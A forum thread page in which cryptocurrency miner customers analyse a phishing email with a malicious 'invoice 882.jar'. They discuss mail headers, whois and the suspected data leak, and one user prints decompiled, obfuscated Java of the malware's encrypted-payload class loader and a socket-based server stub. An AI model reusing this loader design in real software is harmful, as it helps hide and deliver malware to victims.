Official BITMINE CoinCraft series 28nm ASIC miners thread - page 27.

akumaburn

sr. member

Activity: 281

Merit: 250

The Gold Standard of Digital Currency.

Quote from: matt4054 on August 14, 2014, 11:15:45 AM

Quote from: akumaburn on August 14, 2014, 11:13:05 AM

Quote from: Collider on August 14, 2014, 10:56:21 AM

It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.

The headers are real.. it is most likely from bitmine.

Someone managed to hack their mail server.

I wouldn't say that the *e-mails* containing the virus were from Bitmine. I would rather say that they were from some T-Mobile USA customer through SMTP.com But I would definitely say that the *data* (i.e. addresses, possibly more) were leaked from Bitmine servers in some way.

By the way, Bitmine support has just acknowledged the virus by e-mail response to me ("we are investigating")

Code:

Received: from [172.56.17.187] ([172.56.17.187:15292] helo=172.56.39.143)
	by sl-mta06.smtp.com (envelope-from )
	(ecelerity 3.5.5.39309 r(Platform:3.5.5.0)) with ESMTPA
	id 2F/2C-09833-339CCE35; Thu, 14 Aug 2014 14:35:32 +0000

Code:

$ whois 172.56.17.187

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 172.56.17.187"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=172.56.17.187?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       172.32.0.0 - 172.63.255.255
CIDR:           172.32.0.0/11
OriginAS:       AS21928
NetName:        TMO9
NetHandle:      NET-172-32-0-0-1
Parent:         NET-172-0-0-0-0
NetType:        Direct Allocation
RegDate:        2012-09-18
Updated:        2012-09-18
Ref:            http://whois.arin.net/rest/net/NET-172-32-0-0-1

OrgName:        T-Mobile USA, Inc.
OrgId:          TMOBI
Address:        12920 SE 38th Street
City:           Bellevue
StateProv:      WA
PostalCode:     98006
Country:        US
RegDate:        2003-01-02
Updated:        2012-07-13
Ref:            http://whois.arin.net/rest/org/TMOBI

OrgTechHandle: DNSAD11-ARIN
OrgTechName:   DNS Administrators
OrgTechPhone:  +1-888-662-4662
OrgTechEmail:  [email protected]
OrgTechRef:    http://whois.arin.net/rest/poc/DNSAD11-ARIN

OrgAbuseHandle: DNSAD11-ARIN
OrgAbuseName:   DNS Administrators
OrgAbusePhone:  +1-888-662-4662
OrgAbuseEmail:  [email protected]
OrgAbuseRef:    http://whois.arin.net/rest/poc/DNSAD11-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#

Note: the attack *could* have been mitigated by Bitmine if they had implemented strict SPF DNS records on bitmine.ch

I don't think you can find out who sent this just by looking at the "by sl-mta06.smtp.com" tag.

Some mail servers strip those tags and replace them with their own..

Karlog

member

Activity: 66

Merit: 10

It cloud also be malware, i just made a scan with malwarebytes, it found "PUP.Optinoal.InstallD.A" located at: C:\Windows\SysWOW64\installd.exe"

But i don't know what the virus / malware do...

Anyone found anything else?

Wolke

legendary

Activity: 966

Merit: 1000

rofl

i got the same mail of shit

jseppeli

sr. member

Activity: 430

Merit: 500

I just received an e-mail from Bitmine where they inform about these mails and says not to open the jar file

matt4054

legendary

Activity: 1946

Merit: 1035

Quote from: akumaburn on August 14, 2014, 11:13:05 AM

Quote from: Collider on August 14, 2014, 10:56:21 AM

It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.

The headers are real.. it is most likely from bitmine.

Someone managed to hack their mail server.

I wouldn't say that the *e-mails* containing the virus were from Bitmine. I would rather say that they were from some T-Mobile USA customer through SMTP.com But I would definitely say that the *data* (i.e. addresses, possibly more) were leaked from Bitmine servers in some way.

By the way, Bitmine support has just acknowledged the virus by e-mail response to me ("we are investigating")

Code:

Received: from [172.56.17.187] ([172.56.17.187:15292] helo=172.56.39.143)
	by sl-mta06.smtp.com (envelope-from )
	(ecelerity 3.5.5.39309 r(Platform:3.5.5.0)) with ESMTPA
	id 2F/2C-09833-339CCE35; Thu, 14 Aug 2014 14:35:32 +0000

Code:

$ whois 172.56.17.187

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#


#
# Query terms are ambiguous.  The query is assumed to be:
#     "n 172.56.17.187"
#
# Use "?" to get help.
#

#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=172.56.17.187?showDetails=true&showARIN=false&ext=netref2
#

NetRange:       172.32.0.0 - 172.63.255.255
CIDR:           172.32.0.0/11
OriginAS:       AS21928
NetName:        TMO9
NetHandle:      NET-172-32-0-0-1
Parent:         NET-172-0-0-0-0
NetType:        Direct Allocation
RegDate:        2012-09-18
Updated:        2012-09-18
Ref:            http://whois.arin.net/rest/net/NET-172-32-0-0-1

OrgName:        T-Mobile USA, Inc.
OrgId:          TMOBI
Address:        12920 SE 38th Street
City:           Bellevue
StateProv:      WA
PostalCode:     98006
Country:        US
RegDate:        2003-01-02
Updated:        2012-07-13
Ref:            http://whois.arin.net/rest/org/TMOBI

OrgTechHandle: DNSAD11-ARIN
OrgTechName:   DNS Administrators
OrgTechPhone:  +1-888-662-4662
OrgTechEmail:  [email protected]
OrgTechRef:    http://whois.arin.net/rest/poc/DNSAD11-ARIN

OrgAbuseHandle: DNSAD11-ARIN
OrgAbuseName:   DNS Administrators
OrgAbusePhone:  +1-888-662-4662
OrgAbuseEmail:  [email protected]
OrgAbuseRef:    http://whois.arin.net/rest/poc/DNSAD11-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
#
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml
#

Note: the attack *could* have been mitigated by Bitmine if they had implemented strict SPF DNS records on bitmine.ch

akumaburn

sr. member

Activity: 281

Merit: 250

The Gold Standard of Digital Currency.

Quote from: Collider on August 14, 2014, 10:56:21 AM

It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.

The headers are real.. it is most likely from bitmine.

Someone managed to hack their mail server.

matt4054

legendary

Activity: 1946

Merit: 1035

Quote from: Collider on August 14, 2014, 10:56:21 AM

It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.

Theoretically yes, but Occam's razor says "no". I don't know about others but I find it funny that

I am a customer of Bitmine
Virus was sent to the e-mail address that I registered with them (not my usual address)
Virus was sent with the following envelope and header From:

Code:

Return-Path: 
From: "invoice 882"

Of course they are spoofed, but the data is very, very, very likely to have leaked from them.

This, and several reports from people here in such a tiny timeframe indicates a targeted attack, not a random, widespread one IMO.

Collider

hero member

Activity: 714

Merit: 500

It doesn´t neccesarilly mean that the data was leaked from bitmine, it could just be an email spoofing, virus spreading attack.

akumaburn

sr. member

Activity: 281

Merit: 250

The Gold Standard of Digital Currency.

Here is the Main.class JAD output:

Code:

// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3) 
// Source File Name:   b

import java.io.*;
import java.lang.reflect.Method;
import java.lang.reflect.Modifier;
import java.util.HashMap;
import java.util.jar.JarEntry;
import java.util.jar.JarInputStream;

public class Main extends ClassLoader
{

    public Class findClass(String IIiiIiIIiI)
    {
        Class IIiiIiIIiI;
        if((IIiiIiIIiI = (Class)this.IIiiIiIIiI.get(IIiiIiIIiI)) == null) goto _L2; else goto _L1
_L1:
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        resolveClass();
        return;
_L2:
        byte IIiiIiIIiI[];
        try
        {
            return findSystemClass(IIiiIiIIiI);
        }
        catch(ClassNotFoundException IIiiIiIIiI)
        {
            IIiiIiIIiI = (byte[])iiiIiiIiIi.get(IIiiIiIIiI);
        }
        IIiiIiIIiI = ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(IIiiIiIIiI, IIiiIiIIiI);
        this.IIiiIiIIiI.put(IIiiIiIIiI, IIiiIiIIiI);
        return IIiiIiIIiI;
    }

    private byte[] iiIiiIiiIi(byte IIiiIiIIiI[], String IIiiIiIIiI)
    {
        String IIiiIiIIiI;
        byte IIiiIiIIiI[];
        IIiiIiIIiI = (new StringBuilder()).insert(0, IIiiIiIIiI).append(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("u\007NaJ#x\f/}VEv\006W\"s\016\\}NzI")).toString();
        IIiiIiIIiI = IIiiIiIIiI;
        257;
        true;
        true;
        JVM INSTR pop2 ;
        new int[];
        true;
        true;
        JVM INSTR pop2 ;
        int IIiiIiIIiI[];
        IIiiIiIIiI;
        257;
        true;
        true;
        JVM INSTR pop2 ;
        new int[];
        true;
        true;
        JVM INSTR pop2 ;
        int IIiiIiIIiI[];
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        int IIiiIiIIiI;
        IIiiIiIIiI;
_L3:
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR icmpge 85;
           goto _L1 _L2
_L1:
        IIiiIiIIiI++;
        IIiiIiIIiI[IIiiIiIIiI] = IIiiIiIIiI;
        IIiiIiIIiI;
          goto _L3
_L2:
        false;
        true;
        true;
        JVM INSTR pop2 ;
        int IIiiIiIIiI;
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        IIiiIiIIiI;
_L8:
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR icmpge 145;
           goto _L4 _L5
_L4:
        if(IIiiIiIIiI != IIiiIiIIiI.length()) goto _L7; else goto _L6
_L6:
        false;
        true;
        true;
        JVM INSTR pop2 ;
        IIiiIiIIiI;
_L7:
        IIiiIiIIiI++;
        IIiiIiIIiI++;
        IIiiIiIIiI[IIiiIiIIiI] = IIiiIiIIiI.charAt(IIiiIiIIiI);
        IIiiIiIIiI;
          goto _L8
_L5:
        false;
        true;
        true;
        JVM INSTR pop2 ;
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        IIiiIiIIiI;
_L11:
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR icmpge 221;
           goto _L9 _L10
_L9:
        IIiiIiIIiI + IIiiIiIIiI[IIiiIiIIiI] + IIiiIiIIiI[IIiiIiIIiI];
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR irem ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        int IIiiIiIIiI = (char)IIiiIiIIiI[IIiiIiIIiI];
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup_x2 ;
        IIiiIiIIiI;
        JVM INSTR iaload ;
        JVM INSTR iastore ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        IIiiIiIIiI++;
        JVM INSTR iastore ;
        IIiiIiIIiI;
          goto _L11
_L10:
        false;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        int IIiiIiIIiI;
        IIiiIiIIiI;
_L14:
        IIiiIiIIiI.length;
        JVM INSTR icmpge 435;
           goto _L12 _L13
_L12:
        IIiiIiIIiI;
        1;
        1;
        1;
        JVM INSTR pop2 ;
        JVM INSTR iadd ;
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR irem ;
        IIiiIiIIiI;
        IIiiIiIIiI + IIiiIiIIiI[IIiiIiIIiI];
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR irem ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup2 ;
        IIiiIiIIiI;
        JVM INSTR iaload ;
        (char);
        IIiiIiIIiI;
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup_x2 ;
        IIiiIiIIiI;
        JVM INSTR iaload ;
        JVM INSTR iastore ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR iastore ;
        IIiiIiIIiI;
        JVM INSTR iaload ;
        IIiiIiIIiI[IIiiIiIIiI];
        JVM INSTR iadd ;
        256;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR irem ;
        JVM INSTR iaload ;
        (char);
        int IIiiIiIIiI;
        IIiiIiIIiI;
        230;
        true;
        true;
        JVM INSTR pop2 ;
        new byte[];
        true;
        true;
        JVM INSTR pop2 ;
        byte IIiiIiIIiI[];
        IIiiIiIIiI;
        1;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        1;
        IIiiIiIIiI;
        2;
        IIiiIiIIiI;
        1;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        1;
        1;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        true;
        true;
        JVM INSTR pop2 ;
        127;
        1;
        JVM INSTR dup_x1 ;
        JVM INSTR dup ;
        JVM INSTR pop2 ;
        JVM INSTR bastore ;
        true;
        true;
        JVM INSTR pop2 ;
        42;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR bastore ;
        true;
        true;
        JVM INSTR pop2 ;
        32;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR bastore ;
        true;
        true;
        JVM INSTR pop2 ;
        9;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR bastore ;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        IIiiIiIIiI;
        JVM INSTR baload ;
        IIiiIiIIiI;
        JVM INSTR ixor ;
        (byte);
        JVM INSTR bastore ;
        true;
        true;
        JVM INSTR pop2 ;
        86;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR bastore ;
        true;
        true;
        JVM INSTR pop2 ;
        42;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR bastore ;
        true;
        true;
        JVM INSTR pop2 ;
        32;
        true;
        true;
        JVM INSTR pop2 ;
        IIiiIiIIiI++;
        JVM INSTR bastore ;
        IIiiIiIIiI;
          goto _L14
_L13:
        return IIiiIiIIiI;
    }

    public static String ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(String IIiiIiIIiI)
    {
        JVM INSTR new #68  ;
        JVM INSTR dup ;
        JVM INSTR new #222 ;
        JVM INSTR dup ;
        (new Exception()).getStackTrace()[1];
        JVM INSTR dup_x2 ;
        getClassName();
        StringBuffer();
        JVM INSTR swap ;
        getMethodName();
        0;
        JVM INSTR swap ;
        insert();
        toString();
        JVM INSTR dup ;
        length();
        1;
        JVM INSTR isub ;
        (2 ^ 5) << 4 ^ 1 << 1;
        (2 ^ 5) << 4 ^ 2 << 1;
        5 << 4 ^ (3 << 2 ^ 1);
        int j1 = IIiiIiIIiI.length();
        j1;
        new char[j1];
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR swap ;
        1;
        JVM INSTR isub ;
        JVM INSTR dup_x2 ;
        int i;
        i;
        char ac[];
        ac;
        int i1;
        i1;
        int k;
        k;
        JVM INSTR pop ;
        JVM INSTR swap ;
        JVM INSTR dup ;
        int j;
        j;
        int l;
        l;
        JVM INSTR swap ;
        String s;
        s;
          goto _L1
_L6:
        ac;
        k;
        IIiiIiIIiI;
        i--;
        JVM INSTR dup_x2 ;
        charAt();
        s.charAt(j);
        JVM INSTR ixor ;
        JVM INSTR ixor ;
        (char);
        JVM INSTR castore ;
        if(i >= 0) goto _L3; else goto _L2
_L2:
        ac;
          goto _L4
_L3:
        ac;
        i1;
        IIiiIiIIiI;
        i;
        JVM INSTR dup_x2 ;
        charAt();
        s.charAt(j);
        JVM INSTR ixor ;
        JVM INSTR ixor ;
        (char);
        i--;
        j--;
        JVM INSTR castore ;
        if(j < 0)
            j = l;
        i;
_L1:
        JVM INSTR ifge 106;
           goto _L5 _L6
_L5:
        ac;
_L4:
        String();
        return;
    }

    private byte[] ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(ByteArrayOutputStream IIiiIiIIiI)
        throws IOException
    {
        IIiiIiIIiI.close();
        return IIiiIiIIiI.toByteArray();
    }

    public Class loadClass(String IIiiIiIIiI)
        throws ClassNotFoundException
    {
        return findClass(IIiiIiIIiI);
    }

    public synchronized void iiIiiIiiIi()
        throws IOException
    {
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        getClass();
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("z^");
        getResourceAsStream();
        JVM INSTR dup ;
        InputStream IIiiIiIIiI;
        IIiiIiIIiI;
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
        String IIiiIiIIiI;
        IIiiIiIIiI;
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
        IIiiIiIIiI;
        1024;
        true;
        true;
        JVM INSTR pop2 ;
        new byte[];
        true;
        true;
        JVM INSTR pop2 ;
        byte IIiiIiIIiI[];
        IIiiIiIIiI;
        IIiiIiIIiI;
_L3:
        IIiiIiIIiI;
        read();
        JVM INSTR dup ;
        int IIiiIiIIiI;
        IIiiIiIIiI;
        -1;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR icmple 72;
           goto _L1 _L2
_L1:
        IIiiIiIIiI;
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        IIiiIiIIiI;
        write();
          goto _L3
_L2:
        IIiiIiIIiI;
        IIiiIiIIiI;
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup_x2 ;
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
        close();
        close();
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
        toByteArray();
        IIiiIiIIiI;
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
        JVM INSTR dup ;
        JarInputStream IIiiIiIIiI;
        IIiiIiIIiI;
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
        JarEntry IIiiIiIIiI;
        IIiiIiIIiI;
_L8:
        String IIiiIiIIiI;
        ByteArrayOutputStream IIiiIiIIiI;
        if(IIiiIiIIiI.isDirectory())
            continue; /* Loop/switch isn't completed */
        IIiiIiIIiI = ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(IIiiIiIIiI);
        IIiiIiIIiI = new ByteArrayOutputStream();
        IIiiIiIIiI;
_L6:
        IIiiIiIIiI;
        read();
        JVM INSTR dup ;
        IIiiIiIIiI;
        -1;
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR icmple 163;
           goto _L4 _L5
_L4:
        IIiiIiIIiI;
        IIiiIiIIiI;
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        IIiiIiIIiI;
        write();
          goto _L6
_L5:
        iiiIiiIiIi.put(IIiiIiIIiI, ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(IIiiIiIIiI));
        iiIiiIiiIi(IIiiIiIIiI);
        if((IIiiIiIIiI = IIiiIiIIiI.getNextJarEntry()) != null) goto _L8; else goto _L7
_L7:
        IIiiIiIIiI.close();
        return;
    }

    private String ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(JarEntry IIiiIiIIiI)
    {
        String IIiiIiIIiI;
        return IIiiIiIIiI = (IIiiIiIIiI = (IIiiIiIIiI = IIiiIiIIiI.getName()).replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("5"), ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("4"))).replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("\022vX|@i"), "");
    }

    private String ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(InputStream IIiiIiIIiI)
        throws IOException
    {
        InputStreamReader IIiiIiIIiI = new InputStreamReader(IIiiIiIIiI);
        return (new BufferedReader(IIiiIiIIiI)).readLine();
    }

    public static void main(String IIiiIiIIiI[])
        throws Exception
    {
        Main main1;
        System.out.println(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("\037\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\0209\023:\0376>>\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\027\027\020:0\031\0345\024=\0239\0239\0375\024=\020:0\031\0346\027=\0209\0239\0376\027=\02090\031\0376\027=\023:\0209\0345\024>990\031\0345\024=\0239\020:\0346\024=\02390\031\0346\024>\023:\0239\0346\024>\02390\032\0345\027=\023:\0209\0345\024=\020\0203\031\0345\024=\023:\023:\0375\027=\023:3\031\0345\027>\020:\020:\0345\027=\020:3\032\0345\024>\023:\0209\0345\024=\0239\032\032\0345\024=\023:\020:\0346\024>\02090\032\0376\024>\0239\0209\0375\024>\02090\032\0346\024>\0209\0209\0345\024=\023:33\0375\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\03266\024RQ|Ej_t@t\\t0[E5uq_{DvN|\024RQ|eJ_t@rA:F,\022%\024YvW_\031\037\037\027=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0346>>\023:\0209\0345\024=\023:0QHaD'\0345GnK;Uq_{dVN|\032~\\w\0209\0345\024=\023:0\031\0345\027\027\020:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024=\023:\0209\0345\024=\023:0\031\0345\024>99\023:\0376\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\0209\023:\0376\027>\02093\032\0376\027>\020\020"));
        main1 = new Main();
        "F@|An";
        main1;
        JVM INSTR dup_x1 ;
        iiIiiIiiIi();
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd();
        loadClass();
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("Y|Zt");
        1;
        1;
        1;
        JVM INSTR pop2 ;
        new Class[];
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        [Ljava/lang/String;;
        JVM INSTR aastore ;
        getMethod();
        JVM INSTR dup ;
        Method IIiiIiIIiI;
        IIiiIiIIiI;
        getModifiers();
        JVM INSTR dup ;
        int IIiiIiIIiI;
        IIiiIiIIiI;
        Modifier.isPublic();
        JVM INSTR ifeq 115;
           goto _L1 _L2
_L1:
        break MISSING_BLOCK_LABEL_75;
_L2:
        break MISSING_BLOCK_LABEL_115;
        if(!Modifier.isStatic(IIiiIiIIiI))
            break MISSING_BLOCK_LABEL_115;
        IIiiIiIIiI;
        null;
        1;
        1;
        1;
        JVM INSTR pop2 ;
        new Object[];
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        new String[];
        true;
        true;
        JVM INSTR pop2 ;
        JVM INSTR aastore ;
        invoke();
        JVM INSTR pop ;
    }

    public Main()
        throws IOException
    {
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        Main.getClassLoader();
        ClassLoader();
        JVM INSTR new #19  ;
        IIiiIiIIiI;
        JVM INSTR dup_x2 ;
        JVM INSTR dup ;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        ByteArrayOutputStream();
        ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
        JVM INSTR new #22  ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        HashMap();
        IIiiIiIIiI;
        JVM INSTR new #22  ;
        IIiiIiIIiI;
        IIiiIiIIiI;
        JVM INSTR pop2 ;
        JVM INSTR dup ;
        HashMap();
        iiiIiiIiIi;
    }

    public InputStream getResourceAsStream(String IIiiIiIIiI)
    {
        byte IIiiIiIIiI[];
        if((IIiiIiIIiI = (byte[])iiiIiiIiIi.get(IIiiIiIIiI.replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("5"), ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("4")).replace(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("\022vX|@i"), ""))) != null)
            return new ByteArrayInputStream(IIiiIiIIiI);
        else
            return null;
    }

    private Class ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(String IIiiIiIIiI, byte IIiiIiIIiI[])
    {
        IIiiIiIIiI;
        IIiiIiIIiI;
        0;
        true;
        true;
        JVM INSTR pop2 ;
        IIiiIiIIiI;
        JVM INSTR dup_x1 ;
        JVM INSTR arraylength .length;
        defineClass();
        return;
    }

    private void iiIiiIiiIi(JarInputStream IIiiIiIIiI)
        throws IOException
    {
        IIiiIiIIiI.closeEntry();
    }

    private InputStream ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd()
    {
        return getClass().getResourceAsStream(ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd("Jx^Y\177yF`3~\\"));
    }

    private JarEntry ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(JarInputStream IIiiIiIIiI)
        throws IOException
    {
        return IIiiIiIIiI.getNextJarEntry();
    }

    private JarInputStream ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd(byte IIiiIiIIiI[], String IIiiIiIIiI)
        throws IOException
    {
        return new JarInputStream(new ByteArrayInputStream(iiIiiIiiIi(IIiiIiIIiI, IIiiIiIIiI)));
    }

    private final HashMap iiiIiiIiIi;
    private final HashMap IIiiIiIIiI;
    ByteArrayOutputStream ALLATORIxDEMOxASAASDmaDASDriASDASDDASDASDASDADQWDQWlloQWDasdasdasdsd;
}

And the Server.class Jad output

Code:

// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3) 
// Source File Name:   Server.java

package plugins;

import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.net.Socket;
import java.util.Properties;

public abstract class Server
{

    public Server()
    {
    }

    public abstract void onLine();

    public abstract void offLine();

    public abstract String getId();

    public static Properties config;
    public Socket socket;
    public ObjectOutputStream out;
    public ObjectInputStream in;
}

Will keep you posted.

akumaburn

sr. member

Activity: 281

Merit: 250

The Gold Standard of Digital Currency.

Quote from: matt4054 on August 14, 2014, 10:35:09 AM

Quote from: mvma on August 14, 2014, 10:24:52 AM

Yes, the same here. I have received a blank email with the title "Invoice Payment‏ " and a attached file "invoice 882.jar".
I'm checking my computer for a virus infection. Don't try open the attached file.

Same filename for me. At best it means that "only" customer e-mail addresses have been leaked, but that's just the best case scenario. Those who used a non-unique password for Bitmine should change it wherever they used the same one (hopefully their framework/CMS is hashing and salting passwords wisely but we should assume the worst with them...)

As for the Java file, for those who ran it already, expect some nasty shit to hit the fan soon, so sanitize your system ASAP

Quote from: mvma on August 14, 2014, 10:24:52 AM

That company is realy bad Embarrassed

Oh yes they are. My my my... (facepalm)

Jar file appears to try to change some system registry keys..

The file itself is obsuficated with ALLATORI demo version.. however standard deobsufication applications have not worked.

I may go through it at a later date today...

Shame on bitmine...

I honestly thought this was a refund notice or something.. but then I noticed it was a JAR file..

I figured maybe this was their way of showing invoices to everyone on different platforms.. still does not explain the fact that when I ran it on my test system (outside my firewalls) nothing displayed.

Clear cut virus most likely.

matt4054

legendary

Activity: 1946

Merit: 1035

Quote from: mvma on August 14, 2014, 10:24:52 AM

Yes, the same here. I have received a blank email with the title "Invoice Payment‏ " and a attached file "invoice 882.jar".
I'm checking my computer for a virus infection. Don't try open the attached file.

Same filename for me. At best it means that "only" customer e-mail addresses have been leaked, but that's just the best case scenario. Those who used a non-unique password for Bitmine should change it wherever they used the same one (hopefully their framework/CMS is hashing and salting passwords wisely but we should assume the worst with them...)

As for the Java file, for those who ran it already, expect some nasty shit to hit the fan soon, so sanitize your system ASAP

Quote from: mvma on August 14, 2014, 10:24:52 AM

That company is realy bad Embarrassed

Oh yes they are. My my my... (facepalm)

mvma

newbie

Activity: 25

Merit: 0

Yes, the same here. I have received a blank email with the title "Invoice Payment‏ " and a attached file "invoice 882.jar".
